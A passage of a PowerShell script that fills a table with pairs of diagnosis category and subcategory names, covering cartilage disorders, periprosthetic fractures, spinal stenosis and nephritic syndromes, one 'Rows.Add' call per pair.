$null = $DiagnosisList.Rows.Add("Chondromalacia, knee","Chondromalacia, right knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia, knee","Chondromalacia, left knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia, knee","Chondromalacia, unspecified knee") + $null = $DiagnosisList.Rows.Add("Chondromalacia, ankle and joints of foot","Chondromalacia, right ankle and joints of right foot") + $null = $DiagnosisList.Rows.Add("Chondromalacia, ankle and joints of foot","Chondromalacia, left ankle and joints of left foot") + $null = $DiagnosisList.Rows.Add("Chondromalacia, ankle and joints of foot","Chondromalacia, unspecified ankle and joints of foot") + $null = $DiagnosisList.Rows.Add("Chondromalacia, other site","Chondromalacia, other site") + $null = $DiagnosisList.Rows.Add("Chondromalacia, multiple sites","Chondromalacia, multiple sites") + $null = $DiagnosisList.Rows.Add("Chondrolysis, hip","Chondrolysis, right hip") + $null = $DiagnosisList.Rows.Add("Chondrolysis, hip","Chondrolysis, left hip") + $null = $DiagnosisList.Rows.Add("Chondrolysis, hip","Chondrolysis, unspecified hip") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, multiple sites") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, shoulder") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, upper arm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, forearm") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, hand") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, thigh") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, lower leg") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, ankle and foot") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, other site") + $null = $DiagnosisList.Rows.Add("Other specified disorders of cartilage","Other specified disorders of cartilage, unspecified sites") + $null = $DiagnosisList.Rows.Add("Disorder of cartilage, unspecified","Disorder of cartilage, unspecified") + $null = $DiagnosisList.Rows.Add("Other acquired deformities of musculoskeletal system and connective tissue","Acquired deformity of nose") + $null = $DiagnosisList.Rows.Add("Cauliflower ear","Cauliflower ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cauliflower ear","Cauliflower ear, right ear") + $null = $DiagnosisList.Rows.Add("Cauliflower ear","Cauliflower ear, left ear") + $null = $DiagnosisList.Rows.Add("Other acquired deformity of head","Other acquired deformity of head") + $null = $DiagnosisList.Rows.Add("Acquired deformity of neck","Acquired deformity of neck") + $null = $DiagnosisList.Rows.Add("Acquired deformity of chest and rib","Acquired deformity of chest and rib") + $null = $DiagnosisList.Rows.Add("Acquired deformity of pelvis","Acquired deformity of pelvis") + $null = $DiagnosisList.Rows.Add("Other specified acquired deformities of musculoskeletal system","Other specified acquired deformities of musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Acquired deformity of musculoskeletal system, unspecified","Acquired deformity of musculoskeletal system, unspecified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Pseudarthrosis after fusion or arthrodesis") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Postlaminectomy syndrome, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Postradiation kyphosis") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Postlaminectomy kyphosis") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Postsurgical lordosis") + $null = $DiagnosisList.Rows.Add("Intraoperative and postprocedural complications and disorders of musculoskeletal system, not elsewhere classified","Postradiation scoliosis") + $null = $DiagnosisList.Rows.Add("Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate, right arm") + $null = $DiagnosisList.Rows.Add("Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate, left arm") + $null = $DiagnosisList.Rows.Add("Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of humerus following insertion of orthopedic implant, joint prosthesis, or bone plate, unspecified arm") + $null = $DiagnosisList.Rows.Add("Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate, right arm") + $null = $DiagnosisList.Rows.Add("Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate, left arm") + $null = $DiagnosisList.Rows.Add("Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of radius or ulna following insertion of orthopedic implant, joint prosthesis, or bone plate, unspecified arm") + $null = $DiagnosisList.Rows.Add("Fracture of pelvis following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of pelvis following insertion of orthopedic implant, joint prosthesis, or bone plate") + $null = $DiagnosisList.Rows.Add("Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate, right leg") + $null = $DiagnosisList.Rows.Add("Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate, left leg") + $null = $DiagnosisList.Rows.Add("Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of femur following insertion of orthopedic implant, joint prosthesis, or bone plate, unspecified leg") + $null = $DiagnosisList.Rows.Add("Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate, right leg") + $null = $DiagnosisList.Rows.Add("Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate, left leg") + $null = $DiagnosisList.Rows.Add("Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of tibia or fibula following insertion of orthopedic implant, joint prosthesis, or bone plate, unspecified leg") + $null = $DiagnosisList.Rows.Add("Fracture of other bone following insertion of orthopedic implant, joint prosthesis, or bone plate","Fracture of other bone following insertion of orthopedic implant, joint prosthesis, or bone plate") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a musculoskeletal structure complicating a procedure","Intraoperative hemorrhage and hematoma of a musculoskeletal structure complicating a musculoskeletal system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of a musculoskeletal structure complicating a procedure","Intraoperative hemorrhage and hematoma of a musculoskeletal structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a musculoskeletal structure during a procedure","Accidental puncture and laceration of a musculoskeletal structure during a musculoskeletal system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of a musculoskeletal structure during a procedure","Accidental puncture and laceration of a musculoskeletal structure during other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a musculoskeletal structure following a procedure","Postprocedural hemorrhage of a musculoskeletal structure following a musculoskeletal system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hemorrhage of a musculoskeletal structure following a procedure","Postprocedural hemorrhage of a musculoskeletal structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a musculoskeletal structure following a procedure","Postprocedural hematoma of a musculoskeletal structure following a musculoskeletal system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a musculoskeletal structure following a procedure","Postprocedural hematoma of a musculoskeletal structure following other procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a musculoskeletal structure following a procedure","Postprocedural seroma of a musculoskeletal structure following a musculoskeletal system procedure") + $null = $DiagnosisList.Rows.Add("Postprocedural hematoma and seroma of a musculoskeletal structure following a procedure","Postprocedural seroma of a musculoskeletal structure following other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative and postprocedural complications and disorders of the musculoskeletal system","Other intraoperative and postprocedural complications and disorders of the musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right hip joint","Periprosthetic fracture around internal prosthetic right hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right hip joint","Periprosthetic fracture around internal prosthetic right hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right hip joint","Periprosthetic fracture around internal prosthetic right hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left hip joint","Periprosthetic fracture around internal prosthetic left hip joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left hip joint","Periprosthetic fracture around internal prosthetic left hip joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left hip joint","Periprosthetic fracture around internal prosthetic left hip joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right knee joint","Periprosthetic fracture around internal prosthetic right knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right knee joint","Periprosthetic fracture around internal prosthetic right knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right knee joint","Periprosthetic fracture around internal prosthetic right knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left knee joint","Periprosthetic fracture around internal prosthetic left knee joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left knee joint","Periprosthetic fracture around internal prosthetic left knee joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left knee joint","Periprosthetic fracture around internal prosthetic left knee joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right ankle joint","Periprosthetic fracture around internal prosthetic right ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right ankle joint","Periprosthetic fracture around internal prosthetic right ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right ankle joint","Periprosthetic fracture around internal prosthetic right ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left ankle joint","Periprosthetic fracture around internal prosthetic left ankle joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left ankle joint","Periprosthetic fracture around internal prosthetic left ankle joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left ankle joint","Periprosthetic fracture around internal prosthetic left ankle joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right shoulder joint","Periprosthetic fracture around internal prosthetic right shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right shoulder joint","Periprosthetic fracture around internal prosthetic right shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right shoulder joint","Periprosthetic fracture around internal prosthetic right shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left shoulder joint","Periprosthetic fracture around internal prosthetic left shoulder joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left shoulder joint","Periprosthetic fracture around internal prosthetic left shoulder joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left shoulder joint","Periprosthetic fracture around internal prosthetic left shoulder joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right elbow joint","Periprosthetic fracture around internal prosthetic right elbow joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right elbow joint","Periprosthetic fracture around internal prosthetic right elbow joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic right elbow joint","Periprosthetic fracture around internal prosthetic right elbow joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left elbow joint","Periprosthetic fracture around internal prosthetic left elbow joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left elbow joint","Periprosthetic fracture around internal prosthetic left elbow joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around internal prosthetic left elbow joint","Periprosthetic fracture around internal prosthetic left elbow joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around other internal prosthetic joint","Periprosthetic fracture around other internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around other internal prosthetic joint","Periprosthetic fracture around other internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around other internal prosthetic joint","Periprosthetic fracture around other internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around unspecified internal prosthetic joint","Periprosthetic fracture around unspecified internal prosthetic joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around unspecified internal prosthetic joint","Periprosthetic fracture around unspecified internal prosthetic joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Periprosthetic fracture around unspecified internal prosthetic joint","Periprosthetic fracture around unspecified internal prosthetic joint, sequela") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of head region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of cervical region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of thoracic region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of lumbar region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of sacral region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of pelvic region") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of lower extremity") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of upper extremity") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of rib cage") + $null = $DiagnosisList.Rows.Add("Segmental and somatic dysfunction","Segmental and somatic dysfunction of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of head region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of cervical region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of thoracic region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of lumbar region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of sacral region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of pelvic region") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of lower extremity") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of upper extremity") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of rib cage") + $null = $DiagnosisList.Rows.Add("Subluxation complex (vertebral)","Subluxation complex (vertebral) of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of head region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of cervical region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of thoracic region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of lumbar region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of sacral region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of pelvic region") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of lower extremity") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of upper extremity") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of rib cage") + $null = $DiagnosisList.Rows.Add("Subluxation stenosis of neural canal","Subluxation stenosis of neural canal of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of head region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of cervical region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of thoracic region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of lumbar region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of sacral region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of pelvic region") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of lower extremity") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of upper extremity") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of rib cage") + $null = $DiagnosisList.Rows.Add("Osseous stenosis of neural canal","Osseous stenosis of neural canal of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of head region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of cervical region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of thoracic region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of lumbar region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of sacral region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of pelvic region") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of lower extremity") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of upper extremity") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of rib cage") + $null = $DiagnosisList.Rows.Add("Connective tissue stenosis of neural canal","Connective tissue stenosis of neural canal of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of head region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of cervical region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of thoracic region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of lumbar region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of sacral region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of pelvic region") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of lower extremity") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of upper extremity") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of rib cage") + $null = $DiagnosisList.Rows.Add("Intervertebral disc stenosis of neural canal","Intervertebral disc stenosis of neural canal of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of head region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of cervical region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of thoracic region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of lumbar region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of sacral region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of pelvic region") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of lower extremity") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of upper extremity") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of rib cage") + $null = $DiagnosisList.Rows.Add("Osseous and subluxation stenosis of intervertebral foramina","Osseous and subluxation stenosis of intervertebral foramina of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of head region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of cervical region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of thoracic region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of lumbar region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of sacral region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of pelvic region") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of lower extremity") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of upper extremity") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of rib cage") + $null = $DiagnosisList.Rows.Add("Connective tissue and disc stenosis of intervertebral foramina","Connective tissue and disc stenosis of intervertebral foramina of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of head region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of cervical region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of thoracic region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of lumbar region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of sacral region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of pelvic region") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of lower extremity") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of upper extremity") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of rib cage") + $null = $DiagnosisList.Rows.Add("Other biomechanical lesions","Other biomechanical lesions of abdomen and other regions") + $null = $DiagnosisList.Rows.Add("Biomechanical lesion, unspecified","Biomechanical lesion, unspecified") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Acute nephritic syndrome","Acute nephritic syndrome with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Rapidly progressive nephritic syndrome","Rapidly progressive nephritic syndrome with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Recurrent and persistent hematuria","Recurrent and persistent hematuria with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with diffuse membranous glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with diffuse mesangial proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with diffuse endocapillary proliferative glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with diffuse mesangiocapillary glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with dense deposit disease") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with diffuse crescentic glomerulonephritis") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with other morphologic changes") + $null = $DiagnosisList.Rows.Add("Chronic nephritic syndrome","Chronic nephritic syndrome with unspecified morphologic changes") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with minor glomerular abnormality") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with focal and segmental glomerular lesions") + $null = $DiagnosisList.Rows.Add("Nephrotic syndrome","Nephrotic syndrome with diffuse membranous glomerulonephritis") + 